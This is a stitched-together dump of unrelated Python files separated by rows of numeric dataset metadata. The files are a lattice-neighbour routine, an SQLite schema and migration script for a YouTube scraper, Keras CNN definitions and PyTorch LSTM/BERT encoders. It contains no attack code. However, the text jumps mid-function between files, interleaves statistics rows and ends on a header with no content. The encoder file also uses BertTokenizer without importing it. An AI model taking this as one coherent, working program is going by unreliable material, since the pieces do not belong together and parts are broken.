    NNb = -1 * ones((site_count, 4), dtype='int')
    for i in range(site_count):
        xi = coor[i, 0]
        yi = coor[i, 1]
        if xi == xmin:
            # left edge -> right-most site of the same row (search forward)
            for j in range(i, site_count):
                if coor[j, 1] == yi and coor[j, 0] == xmax:
                    NNb[i, 0] = j
                    break
        if yi == ymax:
            # top edge -> bottom site of the same column (search from start)
            for j in range(0, int(coor[i, 0]) + 1):
                if coor[j, 0] == xi and coor[j, 1] == ymin:
                    NNb[i, 1] = j
                    break
        if xi == xmax:
            # right edge -> left-most site of the same row (search backward)
            for j in range(i, -1, -1):
                if coor[j, 1] == yi and coor[j, 0] == xmin:
                    NNb[i, 2] = j
                    break
        if yi == ymin:
            # bottom edge -> top site of the same column (search from end)
            for j in range(site_count - 1, int(coor[i, 0]), -1):
                if coor[j, 0] == xi and coor[j, 1] == ymax:
                    NNb[i, 3] = j
                    break
    return NNb
| 34.534483
| 450
| 0.473889
| 1,651
| 10,015
| 2.843125
| 0.104179
| 0.014487
| 0.019173
| 0.035151
| 0.893907
| 0.88006
| 0.867916
| 0.860673
| 0.854282
| 0.83447
| 0
| 0.0419
| 0.394708
| 10,015
| 289
| 451
| 34.653979
| 0.732432
| 0.027059
| 0
| 0.763636
| 0
| 0
| 0.002056
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.013636
| 0
| 0.109091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f8ee6861407b8a461192395688c62f6e14e2015
| 7,422
|
py
|
Python
|
src/create_new.py
|
quartztester/Youtube_Scraper
|
8f463e795cc7cce9896dd52994b39ecf3a2bebcd
|
[
"MIT"
] | null | null | null |
src/create_new.py
|
quartztester/Youtube_Scraper
|
8f463e795cc7cce9896dd52994b39ecf3a2bebcd
|
[
"MIT"
] | null | null | null |
src/create_new.py
|
quartztester/Youtube_Scraper
|
8f463e795cc7cce9896dd52994b39ecf3a2bebcd
|
[
"MIT"
] | null | null | null |
import sqlite3
import os
def create_new():
    """Create youtube.db with the full current schema (idempotent:
    every statement uses CREATE TABLE IF NOT EXISTS)."""
    connection = sqlite3.connect('youtube.db')
    cursor = connection.cursor()
    schema = (
        """CREATE TABLE IF NOT EXISTS tb_channels (
            Channel_ID TEXT PRIMARY KEY,
            Channel_title TEXT,
            Published_At TEXT NOT NULL,
            Country TEXT,
            View_Count INTEGER,
            Subscriber_Count INTEGER,
            Video_Count INTEGER,
            Playlist_Count INTEGER,
            Channel_Duration INTEGER,
            Duration_in_Text TEXT,
            Is_Deleted INTEGER,
            Deleted_Videos INTEGER,
            Downloaded_Videos INTEGER,
            Folder_Size_GB REAL,
            Channel_last_Scraped TEXT,
            Auto_Update INTEGER,
            Description TEXT
            )
        """,
        """CREATE TABLE IF NOT EXISTS tb_error (
            Channel_ID TEXT NOT NULL
            )
        """,
        """CREATE TABLE IF NOT EXISTS tb_playlists(
            Playlist_ID TEXT PRIMARY KEY,
            Playlist_title TEXT,
            Channel_ID TEXT NOT NULL,
            Channel_Title TEXT NOT NULL,
            Published_At TEXT NOT NULL,
            Current_Video_Count INTEGER,
            Playlist_Seconds INTEGER,
            Playlist_Duration TEXT,
            Is_Seen INTEGER,
            Worth INTEGER,
            Is_Removed INTEGER,
            Deleted_Videos INTEGER,
            Downloaded_Videos INTEGER,
            Folder_Size_GB REAL,
            Playlist_last_Scraped TEXT,
            Auto_Update INTEGER
            )
        """,
        """CREATE TABLE IF NOT EXISTS tb_videos (
            Video_ID TEXT PRIMARY KEY,
            Video_title TEXT,
            Is_Seen INTEGER,
            Worth INTEGER,
            Upload_playlistId TEXT,
            Playlist_ID TEXT,
            Published_At TEXT NOT NULL,
            epoch REAL NOT NULL,
            Channel_ID TEXT NOT NULL,
            Channel_Title TEXT NOT NULL,
            View_Count INTEGER,
            Like_Count INTEGER,
            Dislike_Count INTEGER,
            Upvote_Ratio REAL,
            Comment_Count INTEGER,
            Duration TEXT,
            video_seconds INTEGER,
            Is_Licensed INTEGER,
            Is_Deleted INTEGER,
            Is_Downloaded INTEGER
            )
        """,
        """CREATE TABLE IF NOT EXISTS video_history (
            Video_ID TEXT NOT NULL,
            Title TEXT,
            Watched_at TEXT ,
            epoch REAL NOT NULL,
            Is_in_Main INTEGER,
            Is_Deleted INTEGER,
            PRIMARY KEY ( Video_ID, epoch)
            )
        """,
        """CREATE TABLE IF NOT EXISTS yt_downloaded (
            Video_ID TEXT PRIMARY KEY,
            Resolution TEXT,
            Raw_Size INTEGER,
            Size REAL,
            vid_type TEXT,
            FPS TEXT,
            bitrate,
            Audio_Type TEXT,
            Frequency INTEGER,
            Channels TEXT,
            Is_In_Main INTEGER
            )
        """,
    )
    for statement in schema:
        cursor.execute(statement)
    connection.commit()  # Push the data into database
    connection.close()
def migrate():
    """Upgrade an old-schema youtube.db in place to the current schema.

    Rebuilds tb_channels / tb_playlists / tb_videos with SQLite's
    rename -> recreate -> copy -> drop sequence, then adds the columns
    introduced after the initial release.  Safe to re-run: "duplicate
    column" errors from the ALTERs are expected and ignored — but only
    sqlite3.OperationalError is swallowed (the original bare `except:`
    would also have hidden real failures).
    """
    conn = sqlite3.connect('youtube.db')
    cur = conn.cursor()
    cur.execute("PRAGMA foreign_keys=off")
    cur.execute("BEGIN TRANSACTION")

    # ---- tb_channels: rebuild base table, then add post-release columns ----
    cur.execute("ALTER TABLE tb_channels RENAME TO _tb_channels_old")
    cur.execute("""
        CREATE TABLE IF NOT EXISTS tb_channels (
            Channel_ID TEXT PRIMARY KEY,
            Channel_title TEXT,
            Published_At TEXT NOT NULL,
            Country TEXT,
            View_Count INTEGER,
            Subscriber_Count INTEGER,
            Video_Count INTEGER,
            Playlist_Count INTEGER
            )
        """)
    cur.execute("INSERT INTO tb_channels SELECT * FROM _tb_channels_old")
    try:
        cur.execute("ALTER TABLE tb_channels ADD COLUMN Channel_Duration INTEGER")
        cur.execute("ALTER TABLE tb_channels ADD COLUMN Duration_in_Text TEXT")
        cur.execute("ALTER TABLE tb_channels ADD COLUMN Is_Deleted INTEGER")
        cur.execute("ALTER TABLE tb_channels ADD COLUMN Deleted_Videos INTEGER")
        cur.execute("ALTER TABLE tb_channels ADD COLUMN Downloaded_Videos INTEGER")
        cur.execute("ALTER TABLE tb_channels ADD COLUMN Folder_Size_GB REAL")
        cur.execute("ALTER TABLE tb_channels ADD COLUMN Channel_last_Scraped TEXT")
        cur.execute("ALTER TABLE tb_channels ADD COLUMN Auto_Update INTEGER")
        cur.execute("ALTER TABLE tb_channels ADD COLUMN Description TEXT")
    except sqlite3.OperationalError:
        # These stats were added after the initial release; on a re-run the
        # columns already exist and SQLite raises "duplicate column name".
        pass
    cur.execute("DROP TABLE _tb_channels_old")

    # ---- tb_playlists: same rebuild + post-release columns ----
    cur.execute("ALTER TABLE tb_playlists RENAME TO _tb_playlists_old")
    cur.execute("""CREATE TABLE IF NOT EXISTS tb_playlists(
            Playlist_ID TEXT PRIMARY KEY,
            Playlist_title TEXT,
            Channel_ID TEXT NOT NULL,
            Channel_Title TEXT NOT NULL,
            Published_At TEXT NOT NULL,
            Item_Count INTEGER,
            Playlist_Seconds INTEGER,
            Playlist_Duration TEXT,
            Is_Seen INTEGER,
            Worth INTEGER
            )
        """)
    cur.execute("INSERT INTO tb_playlists SELECT * FROM _tb_playlists_old")
    try:
        cur.execute("ALTER TABLE tb_playlists ADD COLUMN Is_Removed INTEGER")
        cur.execute("ALTER TABLE tb_playlists ADD COLUMN Deleted_Videos INTEGER")
        cur.execute("ALTER TABLE tb_playlists ADD COLUMN Downloaded_Videos INTEGER")
        cur.execute("ALTER TABLE tb_playlists ADD COLUMN Folder_Size_GB REAL")
        cur.execute("ALTER TABLE tb_playlists ADD COLUMN Playlist_last_Scraped TEXT")
        cur.execute("ALTER TABLE tb_playlists ADD COLUMN Auto_Update INTEGER")
        # RENAME COLUMN needs SQLite >= 3.25; older versions raise
        # OperationalError, which is swallowed like a duplicate column.
        cur.execute("ALTER TABLE tb_playlists RENAME COLUMN Item_Count TO Current_Video_Count")
    except sqlite3.OperationalError:
        # These stats were added after the initial release of this code.
        pass
    cur.execute("DROP TABLE _tb_playlists_old")

    # ---- tb_videos: rebuild with the full current column set ----
    cur.execute("ALTER TABLE tb_videos RENAME TO _tb_videos_old")
    cur.execute("""CREATE TABLE IF NOT EXISTS tb_videos (
            Video_ID TEXT PRIMARY KEY,
            Video_title TEXT,
            Is_Seen INTEGER,
            Worth INTEGER,
            Upload_playlistId TEXT,
            Playlist_ID TEXT,
            Published_At TEXT NOT NULL,
            epoch REAL NOT NULL,
            Channel_ID TEXT NOT NULL,
            Channel_Title TEXT NOT NULL,
            View_Count INTEGER,
            Like_Count INTEGER,
            Dislike_Count INTEGER,
            Upvote_Ratio REAL,
            Comment_Count INTEGER,
            Duration TEXT,
            video_seconds INTEGER,
            Is_Licensed INTEGER,
            Is_Deleted INTEGER,
            Is_Downloaded INTEGER
            )
        """)
    cur.execute("INSERT INTO tb_videos SELECT * FROM _tb_videos_old")
    cur.execute("DROP TABLE _tb_videos_old")

    # ---- yt_downloaded replaces the legacy tb_downloaded ----
    cur.execute("""CREATE TABLE IF NOT EXISTS yt_downloaded (
            Video_ID TEXT PRIMARY KEY,
            Resolution TEXT,
            Raw_Size INTEGER,
            Size REAL,
            vid_type TEXT,
            FPS TEXT,
            bitrate,
            Audio_Type TEXT,
            Frequency INTEGER,
            Channels TEXT,
            Is_In_Main INTEGER
            )
        """)
    try:
        cur.execute("DROP TABLE tb_downloaded")
    except sqlite3.OperationalError:
        # Legacy table absent on fresh-ish databases — nothing to drop.
        pass

    cur.execute("PRAGMA foreign_keys=on")
    conn.commit()  # Push the data into database
    conn.close()
def dbase():
    """Ensure youtube.db exists and is on the current schema.

    Creates the database from scratch when missing; otherwise probes for a
    column that only exists in the current schema and migrates on failure.
    """
    if not os.path.exists("youtube.db"):
        create_new()
    else:
        conn = sqlite3.connect('youtube.db')
        cur = conn.cursor()
        try:
            # Deleted_Videos only exists post-migration; its absence means
            # the database is still on the old schema.
            cur.execute("SELECT Deleted_Videos FROM tb_channels")
        except sqlite3.Error:
            # Narrowed from a bare except: anything SQLite-related triggers a
            # migration; unrelated bugs now propagate instead of being hidden.
            migrate()
        finally:
            conn.close()  # the probe connection used to be leaked
# Script entry point: create or upgrade the database in the working directory.
if __name__ == "__main__":
    dbase()
| 30.925
| 95
| 0.625842
| 890
| 7,422
| 4.993258
| 0.135955
| 0.090009
| 0.064131
| 0.085509
| 0.856661
| 0.822232
| 0.783753
| 0.769352
| 0.720297
| 0.654815
| 0
| 0.000782
| 0.311237
| 7,422
| 239
| 96
| 31.054393
| 0.868545
| 0.023309
| 0
| 0.649533
| 0
| 0
| 0.768084
| 0.005798
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014019
| false
| 0.014019
| 0.009346
| 0
| 0.023364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fcc1cf6f6cba7300e13b2a85e6a1b53a5c40aef
| 5,062
|
py
|
Python
|
scripts/models.py
|
tabris2015/robocar
|
602fcc8fb111b3c21111fef57ace467b80f86d9f
|
[
"MIT"
] | 1
|
2018-04-28T21:44:07.000Z
|
2018-04-28T21:44:07.000Z
|
scripts/models.py
|
tabris2015/robocar
|
602fcc8fb111b3c21111fef57ace467b80f86d9f
|
[
"MIT"
] | null | null | null |
scripts/models.py
|
tabris2015/robocar
|
602fcc8fb111b3c21111fef57ace467b80f86d9f
|
[
"MIT"
] | null | null | null |
from keras.models import model_from_json
import numpy as np
import tensorflow as tf
from keras.models import Sequential
from keras.models import Model
from keras.layers import Input, Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D, BatchNormalization
from keras.layers import Activation
from keras import backend as K
def base(input_shape):
    """Baseline CNN: three conv/pool/dropout stages, then a small dense head
    ending in a single tanh output.

    Args:
        input_shape: shape of the input images, e.g. (rows, cols, channels).

    Returns:
        A compiled Sequential model (MSE loss, Adam optimizer).
    """
    stack = [
        Conv2D(64, kernel_size=(3, 3), activation='relu', input_shape=input_shape),
        MaxPooling2D(pool_size=(2, 2)),
        Dropout(0.25),
        Conv2D(32, (3, 3), activation='relu'),
        MaxPooling2D(pool_size=(2, 2)),
        Dropout(0.25),
        Conv2D(16, (3, 3), activation='relu'),
        MaxPooling2D(pool_size=(2, 2)),
        Dropout(0.25),
        Flatten(),
        Dense(32, activation='relu'),
        Dropout(0.5),
        Dense(12, activation='relu'),
        Dense(1, activation='tanh'),
    ]
    model = Sequential(stack)
    model.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy'])
    return model
def conv1(input_shape):
    """CNN with four stacked convolutions before a single pool/dropout stage
    and a small dense head with one tanh output.

    Args:
        input_shape: shape of the input images.

    Returns:
        A compiled Sequential model (MSE loss, Adam optimizer).
    """
    model = Sequential([
        Conv2D(3, kernel_size=(1, 1), activation='relu', input_shape=input_shape),
        Conv2D(8, (3, 3), activation='relu'),
        Conv2D(16, (3, 3), activation='relu'),
        Conv2D(32, (3, 3), activation='relu'),
        MaxPooling2D(pool_size=(2, 2)),
        Dropout(0.25),
        Flatten(),
        Dense(32, activation='relu'),
        Dropout(0.5),
        Dense(12, activation='relu'),
        Dense(1, activation='tanh'),
    ])
    model.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy'])
    return model
def conv2(input_shape):
    """Deeper CNN: five Conv/BatchNorm/ReLU stages (the first four followed
    by 2x2 max-pooling), then dropout and a dense head ending in tanh.

    Args:
        input_shape: shape of the input images.

    Returns:
        A compiled Sequential model (MSE loss, Adam optimizer).
    """
    model = Sequential()
    # (filters, kernel, pool_after) for each Conv -> BN -> ReLU stage.
    stages = [
        (8, (5, 5), True),
        (16, (3, 3), True),
        (32, (3, 3), True),
        (64, (2, 2), True),
        (128, (1, 1), False),
    ]
    for idx, (filters, kernel, pool_after) in enumerate(stages):
        if idx == 0:
            # First layer carries the input shape.
            model.add(Conv2D(filters, kernel_size=kernel, input_shape=input_shape))
        else:
            model.add(Conv2D(filters, kernel))
        model.add(BatchNormalization())
        model.add(Activation('relu'))
        if pool_after:
            model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Dropout(0.25))
    model.add(Flatten())
    model.add(Dense(32, activation='relu'))
    model.add(Dropout(0.5))
    model.add(Dense(16, activation='relu'))
    model.add(Dense(1, activation='tanh'))
    model.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy'])
    return model
def custom_loss(y_true, y_pred):
    """Half mean squared error: 0.5 * mean((y_true - y_pred) ** 2)."""
    return 0.5 * tf.reduce_mean(tf.square(y_true - y_pred))
def simple1(input_shape):
    """Functional-API CNN used with 80x160 images: two conv pairs with
    (4, 2) pooling, a 1x1 linear conv, and an L1-regularized tanh output.

    Args:
        input_shape: shape of the input images.

    Returns:
        A compiled Model (custom_loss, Adam optimizer).
    """
    image_inp = Input(shape=input_shape)
    net = Conv2D(filters=16, kernel_size=(3, 5), activation='relu', padding='valid')(image_inp)
    net = Conv2D(filters=16, kernel_size=(3, 5), activation='relu', padding='valid')(net)
    net = MaxPooling2D((4, 2))(net)
    net = Conv2D(filters=32, kernel_size=(3, 5), activation='relu', padding='valid')(net)
    net = Conv2D(filters=32, kernel_size=(3, 5), activation='relu', padding='valid')(net)
    net = MaxPooling2D((4, 2))(net)
    net = Conv2D(filters=4, kernel_size=(1, 1), activation='linear', padding='same')(net)
    net = Flatten()(net)
    angle_out = Dense(1, activation='tanh', kernel_regularizer='l1')(net)
    model = Model(inputs=[image_inp], outputs=[angle_out])
    model.compile(loss=custom_loss, optimizer='adam', metrics=['accuracy'])
    return model
def simple2(input_shape):
    """Functional-API CNN used with 80x160 images: like simple1 but with a
    third conv pair (64 filters) and pooling stage before the output head.

    Args:
        input_shape: shape of the input images.

    Returns:
        A compiled Model (custom_loss, Adam optimizer).
    """
    image_inp = Input(shape=input_shape)
    net = Conv2D(filters=16, kernel_size=(3, 5), activation='relu', padding='valid')(image_inp)
    net = Conv2D(filters=16, kernel_size=(3, 5), activation='relu', padding='valid')(net)
    net = MaxPooling2D((4, 2))(net)
    net = Conv2D(filters=32, kernel_size=(3, 5), activation='relu', padding='valid')(net)
    net = Conv2D(filters=32, kernel_size=(3, 5), activation='relu', padding='valid')(net)
    net = MaxPooling2D((4, 2))(net)
    net = Conv2D(filters=64, kernel_size=(3, 5), activation='relu', padding='valid')(net)
    net = Conv2D(filters=64, kernel_size=(3, 5), activation='relu', padding='valid')(net)
    net = MaxPooling2D((4, 2))(net)
    net = Conv2D(filters=4, kernel_size=(1, 1), activation='linear', padding='same')(net)
    net = Flatten()(net)
    angle_out = Dense(1, activation='tanh', kernel_regularizer='l1')(net)
    model = Model(inputs=[image_inp], outputs=[angle_out])
    model.compile(loss=custom_loss, optimizer='adam', metrics=['accuracy'])
    return model
| 33.746667
| 93
| 0.661596
| 724
| 5,062
| 4.537293
| 0.122928
| 0.121766
| 0.092542
| 0.107154
| 0.89376
| 0.881583
| 0.856012
| 0.814612
| 0.791476
| 0.776865
| 0
| 0.050071
| 0.163572
| 5,062
| 150
| 94
| 33.746667
| 0.725791
| 0.028052
| 0
| 0.75
| 0
| 0
| 0.065107
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.083333
| 0
| 0.194444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fff630173a07f4d16a10e2758779ff76a57f87e
| 12,318
|
py
|
Python
|
model/encoder.py
|
sahara2001/editsql
|
d4325ac996d1ed0069def6d349e43e2a1914e761
|
[
"MIT"
] | null | null | null |
model/encoder.py
|
sahara2001/editsql
|
d4325ac996d1ed0069def6d349e43e2a1914e761
|
[
"MIT"
] | null | null | null |
model/encoder.py
|
sahara2001/editsql
|
d4325ac996d1ed0069def6d349e43e2a1914e761
|
[
"MIT"
] | null | null | null |
""" Contains code for encoding an input sequence. """
import torch
import torch.nn.functional as F
from .torch_utils import create_multilayer_lstm_params, encode_sequence,encode_sequence_bert
from .gated_graph_conv import GatedGraphConv
class Encoder(torch.nn.Module):
    """ Encodes an input sequence with a multi-layer bidirectional LSTM. """
    def __init__(self, num_layers, input_size, state_size):
        super().__init__()
        self.num_layers = num_layers
        # Each direction gets state_size / 2 so that the concatenated
        # forward+backward state is state_size wide.
        self.forward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-ef")
        self.backward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-eb")
    def forward(self, sequence, embedder, dropout_amount=0.):
        """ Encodes a sequence forward and backward.
        Inputs:
            sequence (list): The tokens to encode.
            embedder (callable): Maps a token to its embedding.
            dropout_amount (float, optional): The amount of dropout to apply.
        Returns:
            (list of Tensor, list of Tensor), list of Tensor, where the first
            pair is the (final cell memories, final cell states) of all
            layers, and the second list is the concatenated forward/backward
            output for every token in the sequence.
        """
        forward_state, forward_outputs = encode_sequence(
            sequence,
            self.forward_lstms,
            embedder,
            dropout_amount=dropout_amount)
        # Backward pass runs over the reversed sequence.
        backward_state, backward_outputs = encode_sequence(
            sequence[::-1],
            self.backward_lstms,
            embedder,
            dropout_amount=dropout_amount)
        # Concatenate the two directions' final states per layer.
        cell_memories = []
        hidden_states = []
        for i in range(self.num_layers):
            cell_memories.append(torch.cat([forward_state[0][i], backward_state[0][i]], dim=0))
            hidden_states.append(torch.cat([forward_state[1][i], backward_state[1][i]], dim=0))
        assert len(forward_outputs) == len(backward_outputs)
        # Re-reverse so backward outputs align token-by-token with forward.
        backward_outputs = backward_outputs[::-1]
        final_outputs = []
        for i in range(len(sequence)):
            final_outputs.append(torch.cat([forward_outputs[i], backward_outputs[i]], dim=0))
        return (cell_memories, hidden_states), final_outputs
#
class SchemaEncoder1(torch.nn.Module):
    """
    Encodes an input sequence with a multi-layer bidirectional LSTM.
    #TODO: graph encoding
    NOTE(review): currently identical to Encoder above — the graph-encoding
    extension is not implemented yet; confirm before deduplicating.
    """
    def __init__(self, num_layers, input_size, state_size):
        super().__init__()
        self.num_layers = num_layers
        # Each direction gets state_size / 2 so that the concatenated
        # forward+backward state is state_size wide.
        self.forward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-ef")
        self.backward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-eb")
    def forward(self, sequence, embedder, dropout_amount=0.):
        """ Encodes a sequence forward and backward.
        Inputs:
            sequence (list): The tokens to encode.
            embedder (callable): Maps a token to its embedding.
            dropout_amount (float, optional): The amount of dropout to apply.
        Returns:
            (list of Tensor, list of Tensor), list of Tensor, where the first
            pair is the (final cell memories, final cell states) of all
            layers, and the second list is the concatenated forward/backward
            output for every token in the sequence.
        """
        forward_state, forward_outputs = encode_sequence(
            sequence,
            self.forward_lstms,
            embedder,
            dropout_amount=dropout_amount)
        # Backward pass runs over the reversed sequence.
        backward_state, backward_outputs = encode_sequence(
            sequence[::-1],
            self.backward_lstms,
            embedder,
            dropout_amount=dropout_amount)
        # Concatenate the two directions' final states per layer.
        cell_memories = []
        hidden_states = []
        for i in range(self.num_layers):
            cell_memories.append(torch.cat([forward_state[0][i], backward_state[0][i]], dim=0))
            hidden_states.append(torch.cat([forward_state[1][i], backward_state[1][i]], dim=0))
        assert len(forward_outputs) == len(backward_outputs)
        # Re-reverse so backward outputs align token-by-token with forward.
        backward_outputs = backward_outputs[::-1]
        final_outputs = []
        for i in range(len(sequence)):
            final_outputs.append(torch.cat([forward_outputs[i], backward_outputs[i]], dim=0))
        return (cell_memories, hidden_states), final_outputs
class Encoder_Gnn(torch.nn.Module):
    """ Encodes a sequence of BERT hidden states with a bidirectional LSTM. """
    def __init__(self, num_layers, input_size, state_size):
        super().__init__()
        self.num_layers = num_layers
        # Each direction gets state_size / 2 so that the concatenated
        # forward+backward state is state_size wide.
        self.forward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-ef")
        self.backward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-eb")
        # NOTE(review): self.l1 is never used inside this class's forward();
        # presumably callers use it to project 768-dim BERT states down to
        # input_size — confirm, otherwise it is dead weight.
        self.l1 = torch.nn.Linear(768,int(input_size))
    def forward(self, last_hidden, dropout_amount=0.):
        """ Encodes a sequence forward and backward.
        10/12 - Add Bert Utterance embedding
        Inputs:
            last_hidden: hidden states from BERT; indexed below as
                [batch, position, hidden], then split into a list of
                per-position tensors.
            dropout_amount (float, optional): The amount of dropout to apply.
        Returns:
            (list of Tensor, list of Tensor), list of Tensor, where the first
            pair is the (final cell memories, final cell states) of all
            layers, and the second list is the concatenated forward/backward
            output for every position in last_hidden.
        """
        # print(sequence, len(sequence))
        # bert utterance encoding
        forward_state = None
        forward_outputs = None
        backward_state = None
        backward_outputs = None
        cell_memories = []
        hidden_states = []
        # Split [batch, seq, hidden] into one squeezed tensor per position.
        last_hidden = [last_hidden[:,i,:].squeeze() for i in range(last_hidden.size()[1])] # size [batch=1, q_len, hidden ]
        forward_state, forward_outputs = encode_sequence_bert(
            last_hidden,
            self.forward_lstms,
            dropout_amount=dropout_amount)
        # print(forward_state[0][0].size(),forward_state[1][0].size())
        # Backward pass runs over the reversed list of states.
        backward_state, backward_outputs = encode_sequence_bert(
            last_hidden[::-1],
            self.backward_lstms,
            dropout_amount=dropout_amount)
        # Concatenate the two directions' final states per layer.
        for i in range(self.num_layers):
            cell_memories.append(torch.cat([forward_state[0][i], backward_state[0][i]], dim=0))
            hidden_states.append(torch.cat([forward_state[1][i], backward_state[1][i]], dim=0))
        assert len(forward_outputs) == len(backward_outputs)
        # Re-reverse so backward outputs align position-by-position.
        backward_outputs = backward_outputs[::-1]
        final_outputs = []
        for i in range(len(last_hidden)):
            final_outputs.append(torch.cat([forward_outputs[i], backward_outputs[i]], dim=0))
        return (cell_memories, hidden_states), final_outputs
class Encoder_Bert(torch.nn.Module):
    """ Encodes an input sequence, optionally embedding it with a pretrained
    BERT model before the bidirectional LSTM pass. """
    def __init__(self, num_layers, input_size, state_size, from_pretrained=False, pretrained_weights='bert-base-uncased'):
        super().__init__()
        self.num_layers = num_layers
        # Each direction gets state_size / 2 so that the concatenated
        # forward+backward state is state_size wide.
        self.forward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-ef")
        self.backward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-eb")
        self.use_bert = from_pretrained
        # Projects 768-dim BERT hidden states down to the LSTM input size.
        self.l1 = torch.nn.Linear(768,int(input_size))
        if from_pretrained:
            print('From pretrained')
            # NOTE(review): BertTokenizer / BertModel are not imported in this
            # module's visible imports — this raises NameError at runtime
            # unless they are injected elsewhere; confirm the transformers
            # import is present in the full file.
            self.bert_tokenizer = BertTokenizer.from_pretrained(pretrained_weights)
            self.bert_model = BertModel.from_pretrained(pretrained_weights)
    def forward(self, sequence, embedder, dropout_amount=0.):
        """ Encodes a sequence forward and backward.
        10/12 - Add Bert Utterance embedding
        Inputs:
            sequence (list of str): The tokens to encode.
            embedder (callable): Maps a token to its embedding (used only
                when use_bert is False).
            dropout_amount (float, optional): The amount of dropout to apply.
        Returns:
            (list of Tensor, list of Tensor), list of Tensor, where the first
            pair is the (final cell memories, final cell states) of all
            layers, and the second list is the concatenated forward/backward
            output per token.
        """
        # print(sequence, len(sequence))
        # bert utterance encoding
        forward_state = None
        forward_outputs = None
        backward_state = None
        backward_outputs = None
        cell_memories = []
        hidden_states = []
        if self.use_bert:
            input_ids = torch.tensor([self.bert_tokenizer.encode(sequence, add_special_tokens=True)],device=torch.device("cuda" if torch.cuda.is_available() else "cpu"))
            last_hidden = None
            with torch.no_grad():
                # create a list of tensor embedding corresponding to words in sequence
                last_hidden = self.bert_model(input_ids)[0]
            # print(last_hidden[:,0,:].size())
            last_hidden = self.l1(last_hidden)
            last_hidden = [last_hidden[:,i,:].squeeze() for i in range(last_hidden.size()[1])] # size [batch=1, q_len, hidden ]
            forward_state, forward_outputs = encode_sequence_bert(
                last_hidden,
                self.forward_lstms,
                dropout_amount=dropout_amount)
            # print(forward_state[0][0].size(),forward_state[1][0].size())
            backward_state, backward_outputs = encode_sequence_bert(
                last_hidden[::-1],
                self.backward_lstms,
                dropout_amount=dropout_amount)
            # cell_memories = []
            # hidden_states = []
            for i in range(self.num_layers):
                cell_memories.append(torch.cat([forward_state[0][i], backward_state[0][i]], dim=0))
                hidden_states.append(torch.cat([forward_state[1][i], backward_state[1][i]], dim=0))
            assert len(forward_outputs) == len(backward_outputs)
        else:
            forward_state, forward_outputs = encode_sequence(
                sequence,
                self.forward_lstms,
                embedder,
                dropout_amount=dropout_amount)
            # print(forward_state[0][0].size(),forward_state[1][0].size())
            backward_state, backward_outputs = encode_sequence(
                sequence[::-1],
                self.backward_lstms,
                embedder,
                dropout_amount=dropout_amount)
            # cell_memories = []
            # hidden_states = []
            for i in range(self.num_layers):
                cell_memories.append(torch.cat([forward_state[0][i], backward_state[0][i]], dim=0))
                hidden_states.append(torch.cat([forward_state[1][i], backward_state[1][i]], dim=0))
            assert len(forward_outputs) == len(backward_outputs)
        backward_outputs = backward_outputs[::-1]
        final_outputs = []
        # NOTE(review): in the use_bert branch the outputs are indexed by the
        # BERT tokenization (which adds special tokens), yet this loop runs
        # over len(sequence) — confirm the lengths line up for the callers.
        for i in range(len(sequence)):
            final_outputs.append(torch.cat([forward_outputs[i], backward_outputs[i]], dim=0))
        return (cell_memories, hidden_states), final_outputs
| 40.923588
| 169
| 0.621773
| 1,518
| 12,318
| 4.810277
| 0.092227
| 0.023829
| 0.037387
| 0.040263
| 0.886059
| 0.886059
| 0.886059
| 0.881265
| 0.881265
| 0.872501
| 0
| 0.010267
| 0.280484
| 12,318
| 301
| 170
| 40.923588
| 0.813607
| 0.283812
| 0
| 0.846667
| 0
| 0
| 0.011447
| 0
| 0
| 0
| 0
| 0.003322
| 0.033333
| 1
| 0.053333
| false
| 0
| 0.026667
| 0
| 0.133333
| 0.006667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82f80a1460641d518fb1f7c4b49a4396c7782072
| 8,483
|
py
|
Python
|
tests/test_iris_net.py
|
xausssr/nnreslib
|
2b3932df41369c329040603154418bb5512506b8
|
[
"MIT"
] | null | null | null |
tests/test_iris_net.py
|
xausssr/nnreslib
|
2b3932df41369c329040603154418bb5512506b8
|
[
"MIT"
] | 3
|
2021-07-25T20:40:44.000Z
|
2021-07-26T08:36:03.000Z
|
tests/test_iris_net.py
|
xausssr/nnreslib
|
2b3932df41369c329040603154418bb5512506b8
